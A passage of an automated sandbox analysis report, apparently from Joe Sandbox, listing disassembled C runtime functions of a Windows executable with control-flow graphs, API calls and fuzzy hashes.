                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 152 40af66-40af6e 153 40af7d-40af88 call 40b84d 152->153 156 40af70-40af7b call 40d2e3 153->156 157 40af8a-40af8b 153->157 156->153 160 40af8c-40af98 156->160 161 40afb3-40afca call 40af49 call 40cd39 160->161 162 40af9a-40afb2 call 40aefc call 40d2bd 160->162 162->161
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                                                                          • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                                          Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 171 401870-401883 call 40af66 174 4018b2 171->174 175 401885-4018a2 SysAllocString 171->175 176 4018b4-4018b8 174->176 175->176 177 4018a4-4018a6 175->177 178 4018c4-4018c9 176->178 179 4018ba-4018bf call 40ad90 176->179 177->176 180 4018a8-4018ad call 40ad90 177->180 179->178 180->174
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocString_malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 959018026-0
                                                                                                                                                                                                                          • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                          • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                                                                                                          Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 183 40d534-40d556 HeapCreate 184 40d558-40d559 183->184 185 40d55a-40d563 183->185
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                          Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                          Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                          • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                          • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                                                                          Function 0047D594 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                          • Instruction ID: bf1d7cff2fc5b19e5de1a229c4e7eaa26ad437be02c7fe772a9c732b09444fc0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31E722D39284BBCF329A685804AF77B749FA2779F1DC167E44C4B392D12D9C44C6AC
                                                                                                                                                                                                                          Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 375 417081-4170a0 376 4170a2-4170bb LCMapStringW 375->376 377 4170da-4170dd 375->377 378 4170c5-4170ce GetLastError 376->378 379 4170bd-4170c3 376->379 380 417101-417109 377->380 381 4170df-4170e2 377->381 378->377 384 4170d0 378->384 379->377 382 4172bb-4172c4 380->382 383 41710f-417111 380->383 385 4170e5-4170e8 381->385 387 4172c6-4172cb 382->387 388 4172ce-4172d1 382->388 383->382 386 417117-41711a 383->386 384->377 389 4170f2-4170fb 385->389 390 4170ea-4170ed 385->390 393 417120-417126 386->393 394 4172ec-4172ee 386->394 387->388 395 4172d3-4172d8 388->395 396 4172db-4172ea call 417a20 388->396 391 4170fd 389->391 392 4170fe 389->392 390->385 397 4170ef 390->397 391->392 392->380 398 417130-417157 MultiByteToWideChar 393->398 399 417128-41712d 393->399 401 417414-41741d 394->401 395->396 396->394 408 4172f3-4172f6 396->408 397->389 398->394 402 41715d 398->402 399->398 403 41741f call 40ce09 401->403 405 4171a2 402->405 406 41715f-417169 402->406 407 417424-417425 403->407 409 4171a5-4171a8 405->409 406->405 410 41716b-417174 406->410 411 4173d7-4173ef LCMapStringA 408->411 412 4172fc-417316 call 417a69 408->412 409->394 414 4171ae-4171c1 MultiByteToWideChar 409->414 415 417176-41717f call 40cfb0 410->415 416 417189-417192 call 40b84d 410->416 417 4173f1-4173f4 411->417 412->394 426 417318-417331 LCMapStringA 412->426 420 4171c7-4171e2 LCMapStringW 414->420 421 4172aa-4172b6 call 4147ae 414->421 435 41719d-4171a0 415->435 442 417181-417187 415->442 434 417194 416->434 416->435 423 4173f6-4173fe call 40b6b5 417->423 424 4173ff-417404 417->424 420->421 430 4171e8-4171ef 420->430 421->401 423->424 427 417412 424->427 428 417406-417409 424->428 436 417333-417335 426->436 437 41733a 426->437 427->401 428->427 438 41740b-417411 call 40b6b5 428->438 440 4171f1-4171f4 430->440 441 41721a-41721c 430->441 443 41719a 434->443 435->409 436->417 445 417379 437->445 446 41733c-41733f 437->446 438->427 440->421 447 4171fa-4171fd 440->447 448 417263 441->448 449 41721e-417228 441->449 442->443 443->435 450 41737b-41737d 445->450 446->445 452 417341-417349 446->452 447->421 454 417203-417215 LCMapStringW 447->454 453 417265-417267 448->453 449->448 455 41722a-417233 449->455 450->436 458 41737f-4173a3 call 40ba30 LCMapStringA 450->458 459 417361-41736a call 40b84d 452->459 460 41734b-417354 call 40cfb0 452->460 453->421 461 417269-41727f LCMapStringW 453->461 454->421 456 417235-41723e call 40cfb0 455->456 457 41724b-417254 call 40b84d 455->457 456->421 478 417240-417249 456->478 481 417256-41725c 457->481 482 41725f-417261 457->482 479 4173a5-4173a7 458->479 480 4173a9-4173cb call 417a69 458->480 484 417375-417377 459->484 485 41736c-417372 459->485 460->436 483 417356-41735f 460->483 467 417281-417286 461->467 468 4172a3-4172a9 call 4147ae 461->468 475 417288-41728a 467->475 476 41728c-41728f 467->476 468->421 486 417292-4172a0 WideCharToMultiByte 475->486 476->486 478->453 487 4173ce-4173d5 call 4147ae 479->487 480->487 481->482 482->453 483->450 484->450 485->484 486->468 487->417
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3809854901-0
                                                                                                                                                                                                                          • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                                          Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 492 4057b0-4057cd 493 4057d3-4057d5 492->493 494 4059c6-4059ce 492->494 493->494 495 4057db-4057ea call 40b84d 493->495 498 4057f0-405834 call 403080 495->498 499 405921-40592a 495->499 502 405837-40583c 498->502 502->502 503 40583e-40584f call 40b84d 502->503 506 405855-40585b 503->506 507 40591c call 405160 503->507 509 405860-405868 506->509 507->499 509->509 510 40586a-40586f 509->510 511 405870-405872 510->511 512 405874 511->512 513 405877-40587b 511->513 512->513 514 405881 513->514 515 40587d-40587f 513->515 516 405885-405889 514->516 515->514 515->516 517 405897-405899 516->517 518 40588b-40588d 516->518 520 4058a5-4058a7 517->520 521 40589b-4058a3 517->521 518->517 519 40588f-405895 518->519 522 4058cc-4058cf 519->522 523 4058b3-4058b5 520->523 524 4058a9-4058b1 520->524 521->522 527 4058d1-4058d9 522->527 528 4058db-4058e0 522->528 525 4058c1-4058c8 523->525 526 4058b7-4058bf 523->526 524->522 525->522 526->522 527->511 527->528 528->507 529 4058e2-4058e4 528->529 530 4058e6-405916 call 404ce0 call 40b84d 529->530 531 40592b-40594e call 40b84d call 4071a0 529->531 530->507 540 405918-40591a 530->540 531->507 541 405950-405953 531->541 540->507 542 405955-40596e call 40bfc1 540->542 541->507 541->542 545 405970-40597a call 40cb9d 542->545 546 40597c-40597d call 40c953 542->546 550 405982-40598a 545->550 546->550 550->507 551 40598c-405990 550->551 552 405992-4059a2 551->552 553 4059a3-4059c5 call 405000 call 40c8e5 551->553
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                                          • API String ID: 680241177-2310465506
                                                                                                                                                                                                                          • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                                          Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 558 40bcc2-40bcde 559 40bce0-40bce3 558->559 560 40bd01 558->560 559->560 562 40bce5-40bce7 559->562 561 40bd03-40bd07 560->561 563 40bd08-40bd0d 562->563 564 40bce9-40bcf8 call 40bfc1 562->564 565 40bd1c-40bd1f 563->565 566 40bd0f-40bd1a 563->566 576 40bcf9-40bcfe call 40e744 564->576 569 40bd21-40bd29 call 40ba30 565->569 570 40bd2c-40bd2e 565->570 566->565 568 40bd3d-40bd50 566->568 574 40bd52-40bd58 568->574 575 40bd5a 568->575 569->570 570->564 573 40bd30-40bd3b 570->573 573->564 573->568 579 40bd61-40bd63 574->579 575->579 576->560 580 40be53-40be56 579->580 581 40bd69-40bd70 579->581 580->561 583 40bd72-40bd77 581->583 584 40bdb6-40bdb9 581->584 583->584 585 40bd79 583->585 586 40be23-40be2d call 40fc07 584->586 587 40bdbb-40bdbf 584->587 588 40beb4 585->588 589 40bd7f-40bd83 585->589 600 40beb8-40bec1 586->600 605 40be33-40be37 586->605 591 40bde0-40bde7 587->591 592 40bdc1-40bdca 587->592 588->600 595 40bd85 589->595 596 40bd87-40bd8a 589->596 593 40bde9 591->593 594 40bdeb-40bdee 591->594 598 40bdd5-40bdda 592->598 599 40bdcc-40bdd3 592->599 593->594 601 40bdf4-40be0a call 40fa20 call 4102f4 594->601 602 40be87-40be8b 594->602 595->596 603 40bd90-40bdb1 call 4103f1 596->603 604 40be5b-40be61 596->604 606 40bddc-40bdde 598->606 599->606 600->561 627 40be10-40be13 601->627 628 40bec6-40beca 601->628 611 40be9d-40beaf call 40bfc1 602->611 612 40be8d-40be9a call 40ba30 602->612 620 40be4b-40be4d 603->620 607 40be72-40be82 call 40bfc1 604->607 608 40be63-40be6f call 40ba30 604->608 605->602 613 40be39-40be48 605->613 606->594 607->576 608->607 611->576 612->611 613->620 620->580 620->581 627->588 629 40be19-40be21 627->629 628->600 629->620
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                                          Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
